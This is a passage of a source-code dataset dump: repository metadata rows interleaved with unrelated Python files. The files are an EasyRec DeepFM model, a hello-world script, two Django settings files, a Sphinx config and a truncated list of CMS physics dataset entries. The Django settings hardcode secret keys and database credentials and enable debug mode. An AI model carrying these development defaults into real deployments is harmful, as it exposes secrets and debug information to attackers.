"and regression and classification algorithms.")
|
[
"[email protected]"
] | |
ff06a8c08e99f929e422c16fb959c283ab298bbe
|
0c6488fd370f8d0e18173ab77eb9443fd61d0576
|
/easy_rec/python/model/deepfm.py
|
f17bec0beb1edaf64e7f166e11d23c14d57b7fca
|
[
"Apache-2.0"
] |
permissive
|
geogubd/EasyRec
|
96a6d32d2795057cc69d5ba4e8948033bdd3e308
|
d4bfd3b40bce1b990a9206112a9429dbd262a116
|
refs/heads/master
| 2023-09-04T02:59:28.832855 | 2021-10-18T05:19:56 | 2021-10-18T05:19:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,459 |
py
|
# -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
import tensorflow as tf
from easy_rec.python.layers import dnn
from easy_rec.python.layers import fm
from easy_rec.python.layers import input_layer
from easy_rec.python.model.rank_model import RankModel
from easy_rec.python.protos.deepfm_pb2 import DeepFM as DeepFMConfig
if tf.__version__ >= '2.0':
tf = tf.compat.v1
class DeepFM(RankModel):
def __init__(self,
model_config,
feature_configs,
features,
labels=None,
is_training=False):
super(DeepFM, self).__init__(model_config, feature_configs, features,
labels, is_training)
assert self._model_config.WhichOneof('model') == 'deepfm', \
'invalid model config: %s' % self._model_config.WhichOneof('model')
self._model_config = self._model_config.deepfm
assert isinstance(self._model_config, DeepFMConfig)
# backward compatibility
if self._model_config.HasField('wide_regularization'):
tf.logging.warn(
'wide_regularization is deprecated, please use l2_regularization')
self._wide_features, _ = self._input_layer(self._feature_dict, 'wide')
self._deep_features, self._fm_features = self._input_layer(
self._feature_dict, 'deep')
if 'fm' in self._input_layer._feature_groups:
_, self._fm_features = self._input_layer(self._feature_dict, 'fm')
def build_input_layer(self, model_config, feature_configs):
# overwrite create input_layer to support wide_output_dim
has_final = len(model_config.deepfm.final_dnn.hidden_units) > 0
if not has_final:
assert model_config.deepfm.wide_output_dim == model_config.num_class
self._input_layer = input_layer.InputLayer(
feature_configs,
model_config.feature_groups,
model_config.deepfm.wide_output_dim,
use_embedding_variable=model_config.use_embedding_variable,
embedding_regularizer=self._emb_reg,
kernel_regularizer=self._l2_reg)
def build_predict_graph(self):
# Wide
wide_fea = tf.reduce_sum(
self._wide_features, axis=1, keepdims=True, name='wide_feature')
# FM
fm_fea = fm.FM(name='fm_feature')(self._fm_features)
# Deep
deep_layer = dnn.DNN(self._model_config.dnn, self._l2_reg, 'deep_feature',
self._is_training)
deep_fea = deep_layer(self._deep_features)
# Final
if len(self._model_config.final_dnn.hidden_units) > 0:
all_fea = tf.concat([wide_fea, fm_fea, deep_fea], axis=1)
final_dnn_layer = dnn.DNN(self._model_config.final_dnn, self._l2_reg,
'final_dnn', self._is_training)
all_fea = final_dnn_layer(all_fea)
output = tf.layers.dense(
all_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='output')
else:
if self._num_class > 1:
fm_fea = tf.layers.dense(
fm_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='fm_logits')
else:
fm_fea = tf.reduce_sum(fm_fea, 1, keepdims=True)
deep_fea = tf.layers.dense(
deep_fea,
self._num_class,
kernel_regularizer=self._l2_reg,
name='deep_logits')
output = wide_fea + fm_fea + deep_fea
self._add_to_prediction_dict(output)
return self._prediction_dict
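# A minimal sketch (an assumption about what easy_rec's fm.FM layer computes,
# kept as a comment so module behaviour is unchanged): the classic
# second-order FM interaction, per embedding dimension, which matches the
# reduce_sum(fm_fea, 1, keepdims=True) above.
#
#   def fm_second_order(emb):              # emb: [batch, num_fields, dim]
#       sum_sq = tf.square(tf.reduce_sum(emb, axis=1))
#       sq_sum = tf.reduce_sum(tf.square(emb), axis=1)
#       return 0.5 * (sum_sq - sq_sum)     # [batch, dim]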
|
[
"[email protected]"
] | |
54dda2fd3569a59243cb0d5b8b7dda99f42080cb
|
ad6ffe99c0ec781b0bb286ce5cb10ca3735bde97
|
/hello-docstring.py
|
6af55db124aa30b82bd510f054f9bb043640e19d
|
[
"MIT"
] |
permissive
|
crunchy-devops/tp-bac-4
|
db7f9ac3824bfcf7cd8b3570c6d45284be53b9d0
|
4784d9c0505ad62bcad7b28d536826126ded435c
|
refs/heads/master
| 2023-02-26T09:18:31.182264 | 2021-02-01T09:26:27 | 2021-02-01T09:26:27 | 330,283,640 | 0 | 10 | null | null | null | null |
UTF-8
|
Python
| false | false | 118 |
py
|
#!/usr/bin/env python3
"""
Author: Herve Meftah <[email protected]>
Purpose: Say hello
"""
print('Hello, World!')
|
[
"[email protected]"
] | |
50664041a00a4b4add3e5bafe2d2107d1fb5a4e5
|
43c398156b5fdab29a533d97e612a242aa2f4a75
|
/Intern/Demo/Demo/settings.py
|
8ec3c8dc64f8d65796d1637c1225e11f8402e312
|
[] |
no_license
|
shahriya2402/leave_management_system
|
7f501d8c5470d4e7499c65ebf96ab793c8e38cdb
|
be665cf0bb48a30868967dc874ebabb8d770139a
|
refs/heads/main
| 2023-04-14T17:53:17.809060 | 2021-05-04T10:23:58 | 2021-05-04T10:23:58 | 364,204,874 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,161 |
py
|
"""
Django settings for Demo project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import mimetypes
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
from django.contrib import messages
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-5iprpo!b*uki216i2%n!7$2e+rw_k8+t3rj23c)e+-9d$d3k^b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'leave.apps.LeaveConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'management',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
}
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
MEDIA_ROOT = 'static/img'
MEDIA_URL = '/img/'
STATICFILES_DIRS = [
    BASE_DIR / "static",
    '/var/www/static/',
]
mimetypes.add_type("text/css", ".css", True)
mimetypes.add_type("text/javascript", ".js", True)
MESSAGE_TAGS = {
    messages.ERROR: 'danger'
}
|
[
"[email protected]"
] | |
c55f78c2df8746a0df7070531eb25fabfb0272d6
|
845c4bd2ff1aba9172cb760a1b77dc1fa5b2ce3d
|
/doc/conf.py
|
c310bca4c701a40c5e2b3d88b3090edb922701a8
|
[] |
no_license
|
fmi-tools/py-fmipp
|
0cea73658f07f675b09edae6ba6325cda6bdc87e
|
e39b80c65e375832c6839a7c2a9edb4117ae409d
|
refs/heads/master
| 2023-08-16T18:09:06.182871 | 2022-11-22T15:38:07 | 2022-11-22T15:38:07 | 222,248,323 | 0 | 1 | null | 2019-11-17T12:58:34 | 2019-11-17T12:58:33 | null |
UTF-8
|
Python
| false | false | 5,603 |
py
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'The FMI++ Python Interface'
copyright = 'AIT Austrian Institute of Technology GmbH'
author = 'AIT FMI++ Development Team'
# The short X.Y version
version = '2.0'
# The full version, including alpha/beta/rc tags
release = '2.0.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.extlinks'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The name of an image file (relative to this directory) to place at the top of the sidebar.
html_logo = 'img/logo_fmipp.svg'
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyFMIPP'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PyFMIPP.tex', 'The FMI++ Python Interface',
'AIT FMI++ Development Team', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'fmipp', 'The FMI++ Python Interface',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PyFMIPP', 'The FMI++ Python Interface',
author, 'PyFMIPP', 'The FMI++ Python Interface is a Python wrapper for the FMI++ Library',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# External link library
extlinks = {
'github_blob': ('https://github.com/fmipp/py-fmipp/blob/main/%s', ''),
'github_tree': ('https://github.com/fmipp/py-fmipp/tree/main/%s', ''),
}
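# Usage in reStructuredText, given the mapping above:
#   :github_blob:`doc/conf.py` -> https://github.com/fmipp/py-fmipp/blob/main/doc/conf.py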
|
[
"[email protected]"
] | |
c3952e3f2d8c1e4e37d335f16d761e86e26fa2f7
|
c0e50f13fe0e20a974b7aeb7db5d5018ecc9a1aa
|
/DjangoRestApis/settings.py
|
12c1f47d386f10f97e06b9da39b0f6efde832eb5
|
[] |
no_license
|
ducquang2/DjangoRestApis
|
4c39b1818caf27396e7af8163c7e661f2813268e
|
38f503c5e387b6e6a7297f84c258ad2fdb3669d7
|
refs/heads/master
| 2023-02-20T05:15:40.566619 | 2021-01-26T07:51:34 | 2021-01-26T07:51:34 | 332,125,499 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,770 |
py
|
"""
Django settings for DjangoRestApis project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(a6+e3mbyv3y6b^^_mkpawrd()i66o-f9muuepiin%5f@hth#0'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
# Tutorials application
'tutorials.apps.TutorialsConfig',
# CORS
'corsheaders',
]
MIDDLEWARE = [
    # CORS middleware must be placed before CommonMiddleware
    'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoRestApis.urls'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': [
'rest_framework_simplejwt.authentication.JWTAuthentication',
],
}
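# JWTAuthentication only validates tokens; issuing them needs URL routes.
# A minimal sketch for urls.py using the stock simplejwt views (the endpoint
# paths here are assumptions, not taken from this project):
#
#   from django.urls import path
#   from rest_framework_simplejwt.views import (
#       TokenObtainPairView, TokenRefreshView,
#   )
#   urlpatterns += [
#       path('api/token/', TokenObtainPairView.as_view()),
#       path('api/token/refresh/', TokenRefreshView.as_view()),
#   ]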
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjangoRestApis.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
'USER': 'quang',
'PASSWORD': '123',
'HOST': '127.0.0.1',
'PORT': '5432',
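        # NOTE: USER/PASSWORD/HOST/PORT are ignored by the sqlite3 backend;
        # they look like leftovers from a PostgreSQL configuration.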
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
ALLOWED_HOSTS = ['*']
CORS_ORIGIN_ALLOW_ALL = False
CORS_ORIGIN_WHITELIST = (
'http://localhost:8081',
'http://localhost:8082',
'http://192.168.1.204:8082',
'http://172.16.4.177:8082',
'http://172.16.4.227:1234',
)
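# Note: django-cors-headers 3.5+ renamed these settings to
# CORS_ALLOW_ALL_ORIGINS and CORS_ALLOWED_ORIGINS; the older names used here
# are still accepted as deprecated aliases.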
|
[
"[email protected]"
] | |
544535a12e8aebb81a573d170387a9a53d5e9f99
|
1e21f0939d4c46db8eeca9fa8ef034ed14b7a549
|
/PhotonTnP_SampleProduction/crab/tnpDatasetDef.py
|
948c5aa42935bdee103b37980cbee893ae9ef5e9
|
[] |
no_license
|
Ming-Yan/photonTnp
|
4e46286998d4e2806e423e2e27893c0a8675494f
|
5468bea3eff51b21eed2701cda4f3e5d2ad9e6bf
|
refs/heads/master
| 2021-10-08T20:33:55.910375 | 2018-10-22T09:12:26 | 2018-10-22T09:12:26 | 162,109,988 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 19,961 |
py
|
datasetsForTnP = [
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Spring16_reHLT.root', 'lumi': -1, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.767, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.985, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.539, 'nEvts': -1},
{'lumiProcessedFile': None, 'campaign': 'crab_project_Moriond17_v1', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/Moriond17_v1/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': -1},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph_Winter2017//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph_Winter2017.root', 'lumi': -1, 'nEvts': 49748967},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.899, 'nEvts': 238592033},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.646, 'nEvts': 93326652},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.353, 'nEvts': 146480008},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.050, 'nEvts': 113169852},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.160, 'nEvts': 70143321},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.391, 'nEvts': 148781520},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20_vRECO/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016prompt_RunHv2//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 8.762, 'nEvts': 123900510},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.349, 'nEvts': 235522176},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 2.363, 'nEvts': 92067646},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.256, 'nEvts': 146495223},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 3.981, 'nEvts': 111208237},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.105, 'nEvts': 70143321},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.544, 'nEvts': 152098617},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunH//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunH', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunH.root', 'lumi': 6.105, 'nEvts': 89863172},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 33584160},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunB.root', 'lumi': -1, 'nEvts': 7384544},
